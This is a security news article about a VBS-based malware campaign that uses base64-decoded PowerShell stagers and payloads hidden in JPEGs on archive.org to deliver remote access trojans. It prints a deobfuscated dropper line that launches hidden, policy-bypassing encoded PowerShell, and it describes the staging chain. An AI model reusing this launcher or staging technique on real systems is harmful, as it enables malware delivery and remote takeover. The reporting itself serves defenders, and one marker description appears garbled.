New Sophisticated Multi-Stage Malware Campaign Weaponizes VBS Files to Execute PowerShell Script

Cyber Security News
3m read

Security researchers have uncovered a sophisticated malware campaign utilizing heavily obfuscated Visual Basic Script (VBS) files to deploy multiple types of remote access trojans (RATs).

The campaign, discovered in June 2025, involves a cluster of 16 open directories containing obfuscated VBS files, all sharing the filename “sostener.vbs” (Spanish for “sustain”).

These files serve as the initial stage of a three-part infection chain that ultimately grants attackers complete remote access to compromised systems.

The malware operation employs a complex multi-stage approach to evade detection and establish persistence.

Initial analysis reveals that the first-stage VBS files are deliberately bloated with nonsensical junk data, reaching sizes of two to three megabytes to complicate analysis.

Despite the varying obfuscation techniques used across samples, they all follow the same operational pattern: decoding base64 payloads and generating PowerShell scripts that connect to command-and-control (C2) infrastructure.

Censys researchers identified 17 unique versions of these VBS files across the infrastructure, noting that the campaign delivers several RAT families including LimeRAT, DCRat, AsyncRAT, and predominantly Remcos.

The threat actors behind this campaign have established a resilient infrastructure using dynamic DNS services, primarily “duckdns[.]org,” to maintain operational capability even as individual components are detected and blocked.

The infection begins when victims execute the initial VBS dropper, which contains heavily obfuscated code designed to hide its true purpose.

Upon execution, the first-stage loader decodes a base64-encoded payload and dynamically constructs a PowerShell script in memory, as shown in the following deobfuscated code fragment:-

' Stage 1 dropper example (deobfuscated)
tensiometer = "base64encodedpayload..."
CreateObject("WScript.Shell").Run "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " & tensiometer, 0, False

This PowerShell script constitutes the second stage of the attack, functioning as a stager that retrieves additional components from remote locations.

What makes this campaign particularly noteworthy is its innovative use of legitimate platforms for hosting malicious payloads.

The stager downloads components from various sources, including the Internet Archive where malware is concealed within seemingly innocent JPEG images.

Specifically, the Stage 3 payloads are embedded between the markers “>” and “>” within these images.

The attackers hide malicious code within JPEG images hosted on archive[.]org, making detection more difficult.

JPEG containing base64-encoded malware stored on archive[.]org (Source – Censys)

The tactics employed in this campaign, including the use of Spanish-language filenames and specific infrastructure patterns, share similarities with operations attributed to APT-C-36 (also known as Blind Eagle), a threat actor known to target Colombian organizations.

However, definitive attribution remains challenging based solely on the available technical evidence. As this campaign continues to evolve, organizations are advised to implement robust email filtering, disable macros by default, and monitor for suspicious PowerShell activity to mitigate potential compromise.

Automate threat response with ANY.RUN’s TI Feeds—Enrich alerts and block malicious IPs across all endpoints -> Request full access

The post New Sophisticated Multi-Stage Malware Campaign Weaponizes VBS Files to Execute PowerShell Script appeared first on Cyber Security News.

cybersecuritynews.com